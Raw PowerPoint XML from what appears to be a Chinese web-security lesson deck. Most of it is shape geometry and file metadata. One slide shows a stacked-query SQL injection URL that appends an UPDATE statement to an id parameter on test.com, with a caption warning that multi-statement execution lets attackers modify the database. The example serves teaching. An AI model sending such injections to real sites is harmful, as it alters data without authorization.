              </a:endParaRP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E2586889-9B16-4847-8A7E-9EAE66394BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625611" y="2727753"/>
            <a:ext cx="7828597" cy="14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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1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test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1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view?id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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=1;update t set name = ‘a‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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where</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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id=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>能够执行多条查询语句，非常危险，因为这意味着能够对数据库直接做更新操作。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D2DA810-A487-7645-AEE2-E274849B1AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EB39096-6B54-C84C-B498-C44806053545}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C99154-0E1C-C742-A741-C4828F28F2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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9A665EA-429F-2B48-BF1A-F04E4024DD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4788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grp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accent5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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C381A3A-8AE9-AF42-8309-F9BE7420621F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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6633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3808</TotalTime>
  <Words>2926</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>232</Paragraphs>
  <Slides>35</Slides>
  <Notes>32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4" baseType="lpstr">
      <vt:lpstr>Alibaba PuHuiTi</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi Light</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi Medium</vt:lpstr>
      <vt:lpstr>Microsoft YaHei UI</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CorelDRAW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课后作业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19475</dc:creator>
  <cp:lastModifiedBy>张 浩</cp:lastModifiedBy>
  <cp:revision>315</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-08T02:18:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T03:14:53Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>